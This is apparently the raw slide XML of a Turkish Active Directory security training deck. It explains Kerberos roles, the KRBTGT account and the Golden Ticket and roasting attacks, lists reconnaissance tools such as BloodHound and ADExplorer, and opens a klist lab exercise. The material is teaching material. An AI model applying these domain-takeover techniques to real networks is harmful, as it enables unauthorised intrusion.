              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>altyapısının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>çalışabilmesi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gerekli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kimlik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>doğrulama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>protokolüdür</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>üzerinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 88 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>numaralı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>portta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>çalışmaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Protokolün</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>çalışma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sürecinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>taraf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bulunmaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>İstemci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (Client): Bir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sunucuya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>servise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>erişmek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Kerberos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kimlik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>doğrulama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>işlemini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>başlatır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sunucu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (Server): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Servisin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>üzerinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>çalıştığı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sunucudur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. Kerberos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>protokolü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sonucu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>istenen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hizmeti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sunmaktadır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KDC (Key Distribution Center) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>AS (Authentication Service) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TGS (Ticket Granting Service)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 5" descr="A diagram of a computer server&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{711E102B-C014-F8B3-7693-A80A47AAC6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12365" y="1593056"/>
            <a:ext cx="6379635" cy="40670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45058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E4F42-6EAF-C266-0781-9D4056601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Kerberos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8F74B-F207-4569-8B83-20B97B7A05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sz="2200"/>
              <a:t>KRBTGT: Kerberos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" err="1"/>
              <a:t>protokolünü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t> KDC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" err="1"/>
              <a:t>servisini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" err="1"/>
              <a:t>yöneten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" err="1"/>
              <a:t>kullanıcı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" err="1"/>
              <a:t>hesabıdır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>Kerberos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" err="1"/>
              <a:t>sırasında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" err="1"/>
              <a:t>kullanılan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" err="1"/>
              <a:t>biletlerin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" err="1"/>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" err="1"/>
              <a:t>kısmı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" err="1"/>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" err="1"/>
              <a:t>hesabın</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" err="1"/>
              <a:t>parola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" err="1"/>
              <a:t>özeti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" err="1"/>
              <a:t>şifrelenmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" err="1"/>
              <a:t>Eğer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" err="1"/>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" err="1"/>
              <a:t>hesabın</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" err="1"/>
              <a:t>parola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" err="1"/>
              <a:t>özeti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" err="1"/>
              <a:t>ele</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" err="1"/>
              <a:t>geçirilebilirse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t> domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" err="1"/>
              <a:t>ortamındaki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" err="1"/>
              <a:t>tüm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" err="1"/>
              <a:t>hesaplar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" err="1"/>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t> ticket </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" err="1"/>
              <a:t>oluşturulabilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>. Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" err="1"/>
              <a:t>sayede</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t> domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" err="1"/>
              <a:t>ortamı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" err="1"/>
              <a:t>ele</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" err="1"/>
              <a:t>geçirilmiş</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" err="1"/>
              <a:t>olur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" err="1"/>
              <a:t>saldırı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" err="1"/>
              <a:t>yöntemi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t> Golden Ticket </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" err="1"/>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" err="1"/>
              <a:t>adlandırılmaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>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CDAC3F-442D-350B-9AF9-10F282097B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2633505"/>
            <a:ext cx="5181600" cy="22021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248524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589CF-71CA-AB96-76F3-4FE46CF27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Önemli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Not – Kerberos Authorization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6FC4F-AB69-1D34-2ECA-2478749DEC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r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sadece</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kimlik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>doğrulama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> (Authentication) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>amacıyla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kullanılmaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.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err="1"/>
              <a:t>Yetkilendirme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> (Authorization) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>aşamasında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kullanılmamaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.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err="1"/>
              <a:t>Protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yetkilendirmeye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yönelik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>veriler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>taşısa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yetkilendirme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>işlevi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>servisler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tarafından</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>farklı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yöntemlerle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>gerçekleştirilmektedir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9798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2544B-FE62-EB15-5EB0-01DE6B4D9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Önemli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Not – Roasting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Saldırıları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261F6-34A7-BE91-CBAC-2EDC4EF02C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r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Objelerin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> (KRBTGT, Service Account, User) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>parolası</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>şifrelenen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>veri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>içeren</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tüm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>biletlere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> offline </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> brute force </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yapılabilir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.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Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sayede</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>eğer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>parola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>basitse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> plain-text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ele</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>geçirilebilir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1984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FB61B-3C9F-8F75-56FE-AA57CD99E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B8DC5-8646-4DC1-3F6E-782CCE9E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Ajanda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4F2A1-E856-D901-DE1B-3D36BF881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Bilgi Toplama</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> Bilgi Toplama </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>LDAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> Bilgi Toplama</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>ADExplorer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>BloodHound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623992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3BFDE-767D-5A08-8A8A-7A4201C72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Uygulama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> #3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6FF4B-D5B6-9FCD-2013-F28E116C44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AD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sunucusu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>üzerinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>oturum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>açınız</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>klist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>komutu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sunucu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>üzerindeki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>biletleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
